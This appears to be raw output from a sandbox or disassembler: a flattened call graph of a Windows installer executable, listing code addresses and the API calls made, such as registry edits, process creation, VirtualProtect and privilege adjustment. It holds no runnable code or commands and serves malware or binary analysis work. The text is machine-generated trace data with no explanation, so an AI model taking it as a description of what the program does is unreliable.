4893->4894 4895 405ddf 2 API calls 4894->4895 4895->4894 5045 4022dd 5046 4022e4 5045->5046 5050 4022f7 5045->5050 5047 4062dc 17 API calls 5046->5047 5048 4022f1 5047->5048 5049 405920 MessageBoxIndirectW 5048->5049 5049->5050 5051 401d5d GetDlgItem GetClientRect 5052 402c41 17 API calls 5051->5052 5053 401d8f LoadImageW SendMessageW 5052->5053 5054 401dad DeleteObject 5053->5054 5055 402ac5 5053->5055 5054->5055 5056 405461 5057 405482 GetDlgItem GetDlgItem GetDlgItem 5056->5057 5058 40560b 5056->5058 5101 404266 SendMessageW 5057->5101 5060 405614 GetDlgItem CreateThread CloseHandle 5058->5060 5061 40563c 5058->5061 5060->5061 5063 405667 5061->5063 5064 405653 ShowWindow ShowWindow 5061->5064 5065 40568c 5061->5065 5062 4054f2 5067 4054f9 GetClientRect GetSystemMetrics SendMessageW SendMessageW 5062->5067 5066 4056c7 5063->5066 5069 4056a1 ShowWindow 5063->5069 5070 40567b 5063->5070 5103 404266 SendMessageW 5064->5103 5071 404298 8 API calls 5065->5071 5066->5065 5076 4056d5 SendMessageW 5066->5076 5074 405567 5067->5074 5075 40554b SendMessageW SendMessageW 5067->5075 5072 4056c1 5069->5072 5073 4056b3 5069->5073 5077 40420a SendMessageW 5070->5077 5078 40569a 5071->5078 5080 40420a SendMessageW 5072->5080 5079 405322 24 API calls 5073->5079 5081 40557a 5074->5081 5082 40556c SendMessageW 5074->5082 5075->5074 5076->5078 5083 4056ee CreatePopupMenu 5076->5083 5077->5065 5079->5072 5080->5066 5085 404231 18 API calls 5081->5085 5082->5081 5084 4062dc 17 API calls 5083->5084 5086 4056fe AppendMenuW 5084->5086 5087 40558a 5085->5087 5088 40571b GetWindowRect 5086->5088 5089 40572e TrackPopupMenu 5086->5089 5090 405593 ShowWindow 5087->5090 5091 4055c7 GetDlgItem SendMessageW 5087->5091 5088->5089 5089->5078 5093 405749 5089->5093 5094 4055a9 ShowWindow 5090->5094 5096 4055b6 5090->5096 5091->5078 5092 4055ee SendMessageW SendMessageW 5091->5092 5092->5078 5095 405765 SendMessageW 5093->5095 5094->5096 5095->5095 5097 405782 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 5095->5097 5102 404266 SendMessageW 5096->5102 5099 4057a7 SendMessageW 5097->5099 5099->5099 5100 4057d0 GlobalUnlock SetClipboardData CloseClipboard 5099->5100 5100->5078 5101->5062 5102->5091 5103->5063 5104 401563 5105 402a6b 5104->5105 5108 406201 wsprintfW 5105->5108 5107 402a70 5108->5107 4092 4023e4 4093 402c41 17 API calls 4092->4093 4094 4023f6 4093->4094 4095 402c41 17 API calls 4094->4095 4096 402400 4095->4096 4109 402cd1 4096->4109 4099 402438 4102 402444 4099->4102 4133 402c1f 4099->4133 4100 40288b 4101 402c41 17 API calls 4103 40242e lstrlenW 4101->4103 4105 402463 RegSetValueExW 4102->4105 4113 403116 4102->4113 4103->4099 4107 402479 RegCloseKey 4105->4107 4107->4100 4110 402cec 4109->4110 4136 406155 4110->4136 4114 40312f 4113->4114 4115 40315d 4114->4115 4143 403347 SetFilePointer 4114->4143 4140 403331 4115->4140 4119 4032ca 4121 40330c 4119->4121 4126 4032ce 4119->4126 4120 40317a GetTickCount 4122 4032b4 4120->4122 4129 4031c9 4120->4129 4123 403331 ReadFile 4121->4123 4122->4105 4123->4122 4124 403331 ReadFile 4124->4129 4125 403331 ReadFile 4125->4126 4126->4122 4126->4125 4127 405e62 WriteFile 4126->4127 4127->4126 4128 40321f GetTickCount 4128->4129 4129->4122 4129->4124 4129->4128 4130 403244 MulDiv wsprintfW 4129->4130 4132 405e62 WriteFile 4129->4132 4131 405322 24 API calls 4130->4131 4131->4129 4132->4129 4134 4062dc 17 API calls 4133->4134 4135 402c34 4134->4135 4135->4102 4137 406164 4136->4137 4138 402410 4137->4138 4139 40616f RegCreateKeyExW 4137->4139 4138->4099 4138->4100 4138->4101 4139->4138 4141 405e33 ReadFile 4140->4141 4142 403168 4141->4142 4142->4119 4142->4120 4142->4122 4143->4115 5109 6f261000 5110 6f26101b 5 API calls 5109->5110 5111 6f261019 5110->5111 5112 404367 lstrcpynW lstrlenW 5113 402868 5114 402c41 17 API calls 5113->5114 5115 40286f FindFirstFileW 5114->5115 5116 402897 5115->5116 5120 402882 5115->5120 5121 406201 wsprintfW 5116->5121 5118 4028a0 5122 4062ba lstrcpynW 5118->5122 5121->5118 5122->5120 5123 401968 5124 402c1f 17 API calls 5123->5124 5125 40196f 5124->5125 5126 402c1f 17 API calls 5125->5126 5127 40197c 5126->5127 5128 402c41 17 API calls 5127->5128 5129 401993 lstrlenW 5128->5129 5130 4019a4 5129->5130 5133 4019e5 5130->5133 5135 4062ba lstrcpynW 5130->5135 5132 4019d5 5132->5133 5134 4019da lstrlenW 5132->5134 5134->5133 5135->5132 5136 403968 5137 403973 5136->5137 5138 40397a GlobalAlloc 5137->5138 5139 403977 5137->5139 5138->5139 5140 40166a 5141 402c41 17 API calls 5140->5141 5142 401670 5141->5142 5143 4065fd 2 API calls 5142->5143 5144 401676 5143->5144 4222 4027ef 4223 4027f6 4222->4223 4226 402a70 4222->4226 4224 402c1f 17 API calls 4223->4224 4225 4027fd 4224->4225 4227 40280c SetFilePointer 4225->4227 4227->4226 4228 40281c 4227->4228 4230 406201 wsprintfW 4228->4230 4230->4226 4231 40176f 4232 402c41 17 API calls 4231->4232 4233 401776 4232->4233 4234 401796 4233->4234 4235 40179e 4233->4235 4270 4062ba lstrcpynW 4234->4270 4271 4062ba lstrcpynW 4235->4271 4238 4017a9 4240 405b8f 3 API calls 4238->4240 4239 40179c 4242 40654e 5 API calls 4239->4242 4241 4017af lstrcatW 4240->4241 4241->4239 4258 4017bb 4242->4258 4243 4065fd 2 API calls 4243->4258 4245 405d8b 2 API calls 4245->4258 4246 4017cd CompareFileTime 4246->4258 4247 40188d 4249 405322 24 API calls 4247->4249 4248 401864 4250 405322 24 API calls 4248->4250 4259 401879 4248->4259 4251 401897 4249->4251 4250->4259 4252 403116 31 API calls 4251->4252 4254 4018aa 4252->4254 4253 4062ba lstrcpynW 4253->4258 4255 4018be SetFileTime 4254->4255 4257 4018d0 FindCloseChangeNotification 4254->4257 4255->4257 4256 4062dc 17 API calls 4256->4258 4257->4259 4260 4018e1 4257->4260 4258->4243 4258->4245 4258->4246 4258->4247 4258->4248 4258->4253 4258->4256 4269 405db0 GetFileAttributesW CreateFileW 4258->4269 4272 405920 4258->4272 4261 4018e6 4260->4261 4262 4018f9 4260->4262 4263 4062dc 17 API calls 4261->4263 4264 4062dc 17 API calls 4262->4264 4265 4018ee lstrcatW 4263->4265 4266 401901 4264->4266 4265->4266 4268 405920 MessageBoxIndirectW 4266->4268 4268->4259 4269->4258 4270->4239 4271->4238 4273 405935 4272->4273 4274 405981 4273->4274 4275 405949 MessageBoxIndirectW 4273->4275 4274->4258 4275->4274 5145 4043f0 5147 404522 5145->5147 5149 404408 5145->5149 5146 40458c 5148 404656 5146->5148 5150 404596 GetDlgItem 5146->5150 5147->5146 5147->5148 5154 40455d GetDlgItem SendMessageW 5147->5154 5156 404298 8 API calls 5148->5156 5151 404231 18 API calls 5149->5151 5152 4045b0 5150->5152 5153 404617 5150->5153 5155 40446f 5151->5155 5152->5153 5161 4045d6 SendMessageW LoadCursorW SetCursor 5152->5161 5153->5148 5157 404629 5153->5157 5178 404253 EnableWindow 5154->5178 5159 404231 18 API calls 5155->5159 5160 404651 5156->5160 5162 40463f 5157->5162 5163 40462f SendMessageW 5157->5163 5165 40447c CheckDlgButton 5159->5165 5182 40469f 5161->5182 5162->5160 5168 404645 SendMessageW 5162->5168 5163->5162 5164 404587 5179 40467b 5164->5179 5176 404253 EnableWindow 5165->5176 5168->5160 5171 40449a GetDlgItem 5177 404266 SendMessageW 5171->5177 5173 4044b0 SendMessageW 5174 4044d6 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 5173->5174 5175 4044cd GetSysColor 5173->5175 5174->5160 5175->5174 5176->5171 5177->5173 5178->5164 5180 404689 5179->5180 5181 40468e SendMessageW 5179->5181 5180->5181 5181->5146 5185 4058e6 ShellExecuteExW 5182->5185 5184 404605 LoadCursorW SetCursor 5184->5153 5185->5184 5186 401a72 5187 402c1f 17 API calls 5186->5187 5188 401a7b 5187->5188 5189 402c1f 17 API calls 5188->5189 5190 401a20 5189->5190 5191 401cf3 5192 402c1f 17 API calls 5191->5192 5193 401cf9 IsWindow 5192->5193 5194 401a20 5193->5194 5195 401573 5196 401583 ShowWindow 5195->5196 5197 40158c 5195->5197 5196->5197 5198 402ac5 5197->5198 5199 40159a ShowWindow 5197->5199 5199->5198 5200 402df3 5201 402e05 SetTimer 5200->5201 5203 402e1e 5200->5203 5201->5203 5202 402e73 5203->5202 5204 402e38 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 5203->5204 5204->5202 4727 6f262993 4728 6f2629e3 4727->4728 4729 6f2629a3 VirtualProtect 4727->4729 4729->4728 5205 4014f5 SetForegroundWindow 5206 402ac5 5205->5206 5207 402576 5208 402c41 17 API calls 5207->5208 5209 40257d 5208->5209 5212 405db0 GetFileAttributesW CreateFileW 5209->5212 5211 402589 5212->5211 4761 401b77 4762 401b84 4761->4762 4763 401bc8 4761->4763 4764 401c0d 4762->4764 4769 401b9b 4762->4769 4765 401bf2 GlobalAlloc 4763->4765 4766 401bcd 4763->4766 4768 4062dc 17 API calls 4764->4768 4773 4022f7 4764->4773 4767 4062dc 17 API calls 4765->4767 4766->4773 4782 4062ba lstrcpynW 4766->4782 4767->4764 4771 4022f1 4768->4771 4780 4062ba lstrcpynW 4769->4780 4775 405920 MessageBoxIndirectW 4771->4775 4774 401bdf GlobalFree 4774->4773 4775->4773 4776 401baa 4781 4062ba lstrcpynW 4776->4781 4778 401bb9 4783 4062ba lstrcpynW 4778->4783 4780->4776 4781->4778 4782->4774 4783->4773 4879 4024f8 4880 402c81 17 API calls 4879->4880 4881 402502 4880->4881 4882 402c1f 17 API calls 4881->4882 4883 40250b 4882->4883 4884 40288b 4883->4884 4885 402533 RegEnumValueW 4883->4885 4886 402527 RegEnumKeyW 4883->4886 4887 402548 4885->4887 4888 40254f RegCloseKey 4885->4888 4886->4888 4887->4888 4888->4884 5213 404a78 5214 404aa4 5213->5214 5215 404a88 5213->5215 5217 404ad7 5214->5217 5218 404aaa SHGetPathFromIDListW 5214->5218 5224 405904 GetDlgItemTextW 5215->5224 5220 404ac1 SendMessageW 5218->5220 5221 404aba 5218->5221 5219 404a95 SendMessageW 5219->5214 5220->5217 5223 40140b 2 API calls 5221->5223 5223->5220 5224->5219 5225 40167b 5226 402c41 17 API calls 5225->5226 5227 401682 5226->5227 5228 402c41 17 API calls 5227->5228 5229 40168b 5228->5229 5230 402c41 17 API calls 5229->5230 5231 401694 MoveFileW 5230->5231 5232 4016a7 5231->5232 5238 4016a0 5231->5238 5234 4065fd 2 API calls 5232->5234 5236 402250 5232->5236 5233 401423 24 API calls 5233->5236 5235 4016b6 5234->5235 5235->5236 5237 406080 36 API calls 5235->5237 5237->5238 5238->5233 5239 401e7d 5240 402c41 17 API calls 5239->5240 5241 401e83 5240->5241 5242 402c41 17 API calls 5241->5242 5243 401e8c 5242->5243 5244 402c41 17 API calls 5243->5244 5245 401e95 5244->5245 5246 402c41 17 API calls 5245->5246 5247 401e9e 5246->5247 5248 401423 24 API calls 5247->5248 5249 401ea5 5248->5249 5256 4058e6 ShellExecuteExW 5249->5256 5251 401ee7 5254 40288b 5251->5254 5257 406745 WaitForSingleObject 5251->5257 5253 401f01 CloseHandle 5253->5254 5256->5251 5258 40675f 5257->5258 5259 406771 GetExitCodeProcess 5258->5259 5260 4066d0 2 API calls 5258->5260 5259->5253 5261 406766 WaitForSingleObject 5260->5261 5261->5258 5262 4019ff 5263 402c41 17 API calls 5262->5263 5264 401a06 5263->5264 5265 402c41 17 API calls 5264->5265 5266 401a0f 5265->5266 5267 401a16 lstrcmpiW 5266->5267 5268 401a28 lstrcmpW 5266->5268 5269 401a1c 5267->5269 5268->5269 5270 401000 5271 401037 BeginPaint GetClientRect 5270->5271 5272 40100c DefWindowProcW 5270->5272 5274 4010f3 5271->5274 5277 401179 5272->5277 5275 401073 CreateBrushIndirect FillRect DeleteObject 5274->5275 5276 4010fc 5274->5276 5275->5274 5278 401102 CreateFontIndirectW 5276->5278 5279 401167 EndPaint 5276->5279 5278->5279 5280 401112 6 API calls 5278->5280 5279->5277 5280->5279 5281 401503 5282 40150b 5281->5282 5284 40151e 5281->5284 5283 402c1f 17 API calls 5282->5283 5283->5284 4144 402484 4155 402c81 4144->4155 4147 402c41 17 API calls 4148 402497 4147->4148 4149 4024a2 RegQueryValueExW 4148->4149 4150 40288b 4148->4150 4151 4024c8 RegCloseKey 4149->4151 4152 4024c2 4149->4152 4151->4150 4152->4151 4160 406201 wsprintfW 4152->4160 4156 402c41 17 API calls 4155->4156 4157 402c98 4156->4157 4158 406127 RegOpenKeyExW 4157->4158 4159 40248e 4158->4159 4159->4147 4160->4151 5285 402104 5286 402c41 17 API calls 5285->5286 5287 40210b 5286->5287 5288 402c41 17 API calls 5287->5288 5289 402115 5288->5289 5290 402c41 17 API calls 5289->5290 5291 40211f 5290->5291 5292 402c41 17 API calls 5291->5292 5293 402129 5292->5293 5294 402c41 17 API calls 5293->5294 5296 402133 5294->5296 5295 402172 CoCreateInstance 5300 402191 5295->5300 5296->5295 5297 402c41 17 API calls 5296->5297 5297->5295 5298 401423 24 API calls 5299 402250 5298->5299 5300->5298 5300->5299 5301 401f06 5302 402c41 17 API calls 5301->5302 5303 401f0c 5302->5303 5304 405322 24 API calls 5303->5304 5305 401f16 5304->5305 5306 4058a3 2 API calls 5305->5306 5307 401f1c 5306->5307 5308 401f3f CloseHandle 5307->5308 5309 40288b 5307->5309 5311 406745 5 API calls 5307->5311 5308->5309 5312 401f31 5311->5312 5312->5308 5314 406201 wsprintfW 5312->5314 5314->5308 5315 6f2610e1 5324 6f261111 5315->5324 5316 6f2611d8 GlobalFree 5317 6f2612ba 2 API calls 5317->5324 5318 6f2611d3 5318->5316 5319 6f2611f8 GlobalFree 5319->5324 5320 6f261272 2 API calls 5323 6f2611c4 GlobalFree 5320->5323 5321 6f261164 GlobalAlloc 5321->5324 5322 6f2612e1 lstrcpyW 5322->5324 5323->5324 5324->5316 5324->5317 5324->5318 5324->5319 5324->5320 5324->5321 5324->5322 5324->5323 5325 6f26166d 5326 6f261516 GlobalFree 5325->5326 5329 6f261685 5326->5329 5327 6f2616cb GlobalFree 5328 6f2616a0 5328->5327 5329->5327 5329->5328 5330 6f2616b7 VirtualFree 5329->5330 5330->5327 5331 40190c 5332 401943 5331->5332 5333 402c41 17 API calls 5332->5333 5334 401948 5333->5334 5335 4059cc 67 API calls 5334->5335 5336 401951 5335->5336 5337 40230c 5338 402314 5337->5338 5339 40231a 5337->5339 5340 402c41 17 API calls 5338->5340 5341 402328 5339->5341 5342 402c41 17 API calls 5339->5342 5340->5339 5343 402336 5341->5343 5344 402c41 17 API calls 5341->5344 5342->5341 5345 402c41 17 API calls 5343->5345 5344->5343 5346 40233f WritePrivateProfileStringW 5345->5346 5347 401f8c 5348 402c41 17 API calls 5347->5348 5349 401f93 5348->5349 5350 406694 5 API calls 5349->5350 5351 401fa2 5350->5351 5352 402026 5351->5352 5353 401fbe GlobalAlloc 5351->5353 5353->5352 5354 401fd2 5353->5354 5355 406694 5 API calls 5354->5355 5356 401fd9 5355->5356 5357 406694 5 API calls 5356->5357 5358 401fe3 5357->5358 5358->5352 5362 406201 wsprintfW 5358->5362 5360 402018 5363 406201 wsprintfW 5360->5363 5362->5360 5363->5352 4193 40238e 4194 4023c1 4193->4194 4195 402396 4193->4195 4197 402c41 17 API calls 4194->4197 4196 402c81 17 API calls 4195->4196 4198 40239d 4196->4198 4199 4023c8 4197->4199 4200 4023a7 4198->4200 4204 4023d5 4198->4204 4205 402cff 4199->4205 4202 402c41 17 API calls 4200->4202 4203 4023ae RegDeleteValueW RegCloseKey 4202->4203 4203->4204 4206 402d13 4205->4206 4207 402d0c 4205->4207 4206->4207 4209 402d44 4206->4209 4207->4204 4210 406127 RegOpenKeyExW 4209->4210 4211 402d72 4210->4211 4212 402dec 4211->4212 4214 402d76 4211->4214 4212->4207 4213 402d98 RegEnumKeyW 4213->4214 4215 402daf RegCloseKey 4213->4215 4214->4213 4214->4215 4216 402dd0 RegCloseKey 4214->4216 4218 402d44 6 API calls 4214->4218 4217 406694 5 API calls 4215->4217 4216->4212 4219 402dbf 4217->4219 4218->4214 4220 402de0 RegDeleteKeyW 4219->4220 4221 402dc3 4219->4221 4220->4212 4221->4212 4276 40338f SetErrorMode GetVersion 4277 4033ce 4276->4277 4278 4033d4 4276->4278 4279 406694 5 API calls 4277->4279 4280 406624 3 API calls 4278->4280 4279->4278 4281 4033ea lstrlenA 4280->4281 4281->4278 4282 4033fa 4281->4282 4283 406694 5 API calls 4282->4283 4284 403401 4283->4284 4285 406694 5 API calls 4284->4285 4286 403408 4285->4286 4287 406694 5 API calls 4286->4287 4288 403414 #17 OleInitialize SHGetFileInfoW 4287->4288 4366 4062ba lstrcpynW 4288->4366 4291 403460 GetCommandLineW 4367 4062ba lstrcpynW 4291->4367 4293 403472 4294 405bbc CharNextW 4293->4294 4295 403497 CharNextW 4294->4295 4296 4035c1 GetTempPathW 4295->4296 4301 4034b0 4295->4301 4368 40335e 4296->4368 4298 4035d9 4299 403633 DeleteFileW 4298->4299 4300 4035dd GetWindowsDirectoryW lstrcatW 4298->4300 4378 402edd GetTickCount GetModuleFileNameW 4299->4378 4302 40335e 12 API calls 4300->4302 4303 405bbc CharNextW 4301->4303 4311 4035ac 4301->4311 4313 4035aa 4301->4313 4305 4035f9 4302->4305 4303->4301 4305->4299 4306 4035fd GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 4305->4306 4312 40335e 12 API calls 4306->4312 4307 403647 4308 4036fa 4307->4308 4309 4036ea 4307->4309 4314 405bbc CharNextW 4307->4314 4465 4038d0 4308->4465 4406 4039aa 4309->4406 4462 4062ba lstrcpynW 4311->4462 4318 40362b 4312->4318 4313->4296 4330 403666 4314->4330 4318->4299 4318->4308 4319 403834 4322 4038b8 ExitProcess 4319->4322 4323 40383c GetCurrentProcess OpenProcessToken 4319->4323 4320 403714 4321 405920 MessageBoxIndirectW 4320->4321 4327 403722 ExitProcess 4321->4327 4328 403854 LookupPrivilegeValueW AdjustTokenPrivileges 4323->4328 4329 403888 4323->4329 4325 4036c4 4331 405c97 18 API calls 4325->4331 4326 40372a 4332 40588b 5 API calls 4326->4332 4328->4329 4333 406694 5 API calls 4329->4333 4330->4325 4330->4326 4335 4036d0 4331->4335 4336 40372f lstrcatW 4332->4336 4334 40388f 4333->4334 4337 4038a4 ExitWindowsEx 4334->4337 4340 4038b1 4334->4340 4335->4308 4463 4062ba lstrcpynW 4335->4463 4338 403740 lstrcatW 4336->4338 4339 40374b lstrcatW lstrcmpiW 4336->4339 4337->4322 4337->4340 4338->4339 4339->4308 4342 403767 4339->4342 4477 40140b 4340->4477 4343 403773 4342->4343 4344 40376c 4342->4344 4348 40586e 2 API calls 4343->4348 4347 4057f1 4 API calls 4344->4347 4346 4036df 4464 4062ba lstrcpynW 4346->4464 4350 403771 4347->4350 4351 403778 SetCurrentDirectoryW 4348->4351 4350->4351 4352 403793 4351->4352 4353 403788 4351->4353 4473 4062ba lstrcpynW 4352->4473 4472 4062ba lstrcpynW 4353->4472 4356 4062dc 17 API calls 4357 4037d2 DeleteFileW 4356->4357 4358 4037df CopyFileW 4357->4358 4363 4037a1 4357->4363 4358->4363 4359 403828 4361 406080 36 API calls 4359->4361 4360 406080 36 API calls 4360->4363 4361->4308 4362 4062dc 17 API calls 4362->4363 4363->4356 4363->4359 4363->4360 4363->4362 4365 403813 CloseHandle 4363->4365 4474 4058a3 CreateProcessW 4363->4474 4365->4363 4366->4291 4367->4293 4369 40654e 5 API calls 4368->4369 4371 40336a 4369->4371 4370 403374 4370->4298 4371->4370 4372 405b8f 3 API calls 4371->4372 4373 40337c 4372->4373 4374 40586e 2 API calls 4373->4374 4375 403382 4374->4375 4480 405ddf 4375->4480 4484 405db0 GetFileAttributesW CreateFileW 4378->4484 4380 402f1d 4381 402f2d 4380->4381 4485 4062ba lstrcpynW 4380->4485 4381->4307 4383 402f43 4384 405bdb 2 API calls 4383->4384 4385 402f49 4384->4385 4486 4062ba lstrcpynW 4385->4486 4387 402f54 GetFileSize 4402 402f6b 4387->4402 4403 403050 4387->4403 4389 403331 ReadFile 4389->4402 4390 403059 4390->4381 4391 403089 GlobalAlloc 4390->4391 4499 403347 SetFilePointer 4390->4499 4498 403347 SetFilePointer 4391->4498 4393 4030bc 4396 402e79 6 API calls 4393->4396 4395 4030a4 4398 403116 31 API calls 4395->4398 4396->4381 4397 403072 4399 403331 ReadFile 4397->4399 4404 4030b0 4398->4404 4400 40307d 4399->4400 4400->4381 4400->4391 4401 402e79 6 API calls 4401->4402 4402->4381 4402->4389 4402->4393 4402->4401 4402->4403 4487 402e79 4403->4487 4404->4381 4404->4404 4405 4030ed SetFilePointer 4404->4405 4405->4381 4407 406694 5 API calls 4406->4407 4408 4039be 4407->4408 4409 4039c4 4408->4409 4410 4039d6 4408->4410 4512 406201 wsprintfW 4409->4512 4411 406188 3 API calls 4410->4411 4412 403a06 4411->4412 4414 403a25 lstrcatW 4412->4414 4415 406188 3 API calls 4412->4415 4416 4039d4 4414->4416 4415->4414 4504 403c80 4416->4504 4419 405c97 18 API calls 4420 403a57 4419->4420 4421 403aeb 4420->4421 4423 406188 3 API calls 4420->4423 4422 405c97 18 API calls 4421->4422 4424 403af1 4422->4424 4425 403a89 4423->4425 4426 403b01 LoadImageW 4424->4426 4427 4062dc 17 API calls 4424->4427 4425->4421 4433 403aaa lstrlenW 4425->4433 4437 405bbc CharNextW 4425->4437 4428 403ba7 4426->4428 4429 403b28 RegisterClassW 4426->4429 4427->4426 4432 40140b 2 API calls 4428->4432 4430 403bb1 4429->4430 4431 403b5e SystemParametersInfoW CreateWindowExW 4429->4431 4430->4308 4431->4428 4436 403bad 4432->4436 4434 403ab8 lstrcmpiW 4433->4434 4435 403ade 4433->4435 4434->4435 4438 403ac8 GetFileAttributesW 4434->4438 4439 405b8f 3 API calls 4435->4439 4436->4430 4442 403c80 18 API calls 4436->4442 4440 403aa7 4437->4440 4441 403ad4 4438->4441 4443 403ae4 4439->4443 4440->4433 4441->4435 4444 405bdb 2 API calls 4441->4444 4445 403bbe 4442->4445 4513 4062ba lstrcpynW 4443->4513 4444->4435 4447 403bca ShowWindow 4445->4447 4448 403c4d 4445->4448 4450 406624 3 API calls 4447->4450 4514 4053f5 OleInitialize 4448->4514 4455 403be2 4450->4455 4451 403c53 4452 403c57 4451->4452 4453 403c6f 4451->4453 4452->4430 4461 40140b 2 API calls 4452->4461 4456 40140b 2 API calls 4453->4456 4454 403bf0 GetClassInfoW 4458 403c04 GetClassInfoW RegisterClassW 4454->4458 4459 403c1a DialogBoxParamW 4454->4459 4455->4454 4457 406624 3 API calls 4455->4457 4456->4430 4457->4454 4458->4459 4460 40140b 2 API calls 4459->4460 4460->4430 4461->4430 4462->4313 4463->4346 4464->4309 4466 4038e8 4465->4466 4467 4038da CloseHandle 4465->4467 4532 403915 4466->4532 4467->4466 4470 4059cc 67 API calls 4471 403703 OleUninitialize 4470->4471 4471->4319 4471->4320 4472->4352 4473->4363 4475 4058e2 4474->4475 4476 4058d6 CloseHandle 4474->4476 4475->4363 4476->4475 4478 401389 2 API calls 4477->4478 4479 401420 4478->4479 4479->4322 4481 405dec GetTickCount GetTempFileNameW 4480->4481 4482 405e22 4481->4482 4483 40338d 4481->4483 4482->4481 4482->4483 4483->4298 4484->4380 4485->4383 4486->4387 4488 402e82 4487->4488 4489 402e9a 4487->4489 4490 402e92 4488->4490 4491 402e8b DestroyWindow 4488->4491 4492 402ea2 4489->4492 4493 402eaa GetTickCount 4489->4493 4490->4390 4491->4490 4500 4066d0 4492->4500 4495 402eb8 CreateDialogParamW ShowWindow 4493->4495 4496 402edb 4493->4496 4495->4496 4496->4390 4498->4395 4499->4397 4501 4066ed PeekMessageW 4500->4501 4502 4066e3 DispatchMessageW 4501->4502 4503 402ea8 4501->4503 4502->4501 4503->4390 4505 403c94 4504->4505 4521 406201 wsprintfW 4505->4521 4507 403d05 4522 403d39 4507->4522 4509 403a35 4509->4419 4510 403d0a 4510->4509 4511 4062dc 17 API calls 4510->4511 4511->4510 4512->4416 4513->4421 4525 40427d 4514->4525 4516 405418 4520 40543f 4516->4520 4528 401389 4516->4528 4517 40427d SendMessageW 4518 405451 OleUninitialize 4517->4518 4518->4451 4520->4517 4521->4507 4523 4062dc 17 API calls 4522->4523 4524 403d47 SetWindowTextW 4523->4524 4524->4510 4526 404295 4525->4526 4527 404286 SendMessageW 4525->4527 4526->4516 4527->4526 4530 401390 4528->4530 4529 4013fe 4529->4516 4530->4529 4531 4013cb MulDiv SendMessageW 4530->4531 4531->4530 4534 403923 4532->4534 4533 4038ed 4533->4470 4534->4533 4535 403928 FreeLibrary GlobalFree 4534->4535 4535->4533 4535->4535 5364 40190f 5365 402c41 17 API calls 5364->5365 5366 401916 5365->5366 5367 405920 MessageBoxIndirectW 5366->5367 5368 40191f 5367->5368 5369 401491 5370 405322 24 API calls 5369->5370 5371 401498 5370->5371 5372 401d14 5373 402c1f 17 API calls 5372->5373 5374 401d1b 5373->5374 5375 402c1f 17 API calls 5374->5375 5376 401d27 GetDlgItem 5375->5376 5377 402592 5376->5377 4730 405296 4731 4052a6 4730->4731 4732 4052ba 4730->4732 4733 4052ac 4731->4733 4743 405303 4731->4743 4734 4052c2 IsWindowVisible 4732->4734 4735 4052e2 4732->4735 4737 40427d SendMessageW 4733->4737 4738 4052cf 4734->4738 4734->4743 4736 405308 CallWindowProcW 4735->4736 4749 404c6c 4735->4749 4739 4052b6 4736->4739 4737->4739 4744 404bec SendMessageW 4738->4744 4743->4736 4745 404c4b SendMessageW 4744->4745 4746 404c0f GetMessagePos ScreenToClient SendMessageW 4744->4746 4747 404c43 4745->4747 4746->4747 4748 404c48 4746->4748 4747->4735 4748->4745 4758 4062ba lstrcpynW 4749->4758 4751 404c7f 4759 406201 wsprintfW 4751->4759 4753 404c89 4754 40140b 2 API calls 4753->4754 4755 404c92 4754->4755 4760 4062ba lstrcpynW 4755->4760 4757 404c99 4757->4743 4758->4751 4759->4753 4760->4757 5378 402598 5379 4025c7 5378->5379 5380 4025ac 5378->5380 5381 4025fb 5379->5381 5382 4025cc 5379->5382 5383 402c1f 17 API calls 5380->5383 5385 402c41 17 API calls 5381->5385 5384 402c41 17 API calls 5382->5384 5388 4025b3 5383->5388 5386 4025d3 WideCharToMultiByte lstrlenA 5384->5386 5387 402602 lstrlenW 5385->5387 5386->5388 5387->5388 5389 40262f 5388->5389 5390 402645 5388->5390 5392 405e91 5 API calls 5388->5392 5389->5390 5391 405e62 WriteFile 5389->5391 5391->5390 5392->5389 5393 6f2622fd 5394 6f262367 5393->5394 5395 6f262372 GlobalAlloc 5394->5395 5396 6f262391 5394->5396 5395->5394 4896 404c9e GetDlgItem GetDlgItem 4897 404cf0 7 API calls 4896->4897 4905 404f09 4896->4905 4898 404d93 DeleteObject 4897->4898 4899 404d86 SendMessageW 4897->4899 4900 404d9c 4898->4900 4899->4898 4902 404dab 4900->4902 4903 404dd3 4900->4903 4901 404fed 4908 405099 4901->4908 4914 405281 4901->4914 4915 405046 SendMessageW 4901->4915 4904 4062dc 17 API calls 4902->4904 4907 404231 18 API calls 4903->4907 4909 404db5 SendMessageW SendMessageW 4904->4909 4905->4901 4906 404fce 4905->4906 4912 404f69 4905->4912 4906->4901 4917 404fdf SendMessageW 4906->4917 4913 404de7 4907->4913 4910 4050a3 SendMessageW 4908->4910 4911 4050ab 4908->4911 4909->4900 4910->4911 4918 4050d4 4911->4918 4924 4050c4 4911->4924 4925 4050bd ImageList_Destroy 4911->4925 4919 404bec 5 API calls 4912->4919 4920 404231 18 API calls 4913->4920 4916 404298 8 API calls 4914->4916 4915->4914 4922 40505b SendMessageW 4915->4922 4923 40528f 4916->4923 4917->4901 4921 405243 4918->4921 4942 404c6c 4 API calls 4918->4942 4947 40510f 4918->4947 4941 404f7a 4919->4941 4928 404df5 4920->4928 4921->4914 4930 405255 ShowWindow GetDlgItem ShowWindow 4921->4930 4929 40506e 4922->4929 4924->4918 4926 4050cd GlobalFree 4924->4926 4925->4924 4926->4918 4927 404eca GetWindowLongW SetWindowLongW 4931 404ee3 4927->4931 4928->4927 4934 404e45 SendMessageW 4928->4934 4936 404ec4 4928->4936 4939 404e81 SendMessageW 4928->4939 4940 404e92 SendMessageW 4928->4940 4935 40507f SendMessageW 4929->4935 4930->4914 4932 404f01 4931->4932 4933 404ee9 ShowWindow 4931->4933 4953 404266 SendMessageW 4932->4953 4952 404266 SendMessageW 4933->4952 4934->4928 4935->4908 4936->4927 4936->4931 4939->4928 4940->4928 4941->4906 4942->4947 4943 404efc 4943->4914 4944 405219 InvalidateRect 4944->4921 4945 40522f 4944->4945 4954 404ba7 4945->4954 4946 40513d SendMessageW 4948 405153 4946->4948 4947->4946 4947->4948 4948->4944 4949 4051b4 4948->4949 4951 4051c7 SendMessageW SendMessageW 4948->4951 4949->4951 4951->4948 4952->4943 4953->4905 4957 404ade 4954->4957 4956 404bbc 4956->4921 4958 404af7 4957->4958 4959 4062dc 17 API calls 4958->4959 4960 404b5b 4959->4960 4961 4062dc 17 API calls 4960->4961 4962 404b66 4961->4962 4963 4062dc 17 API calls 4962->4963 4964 404b7c lstrlenW wsprintfW SetDlgItemTextW 4963->4964 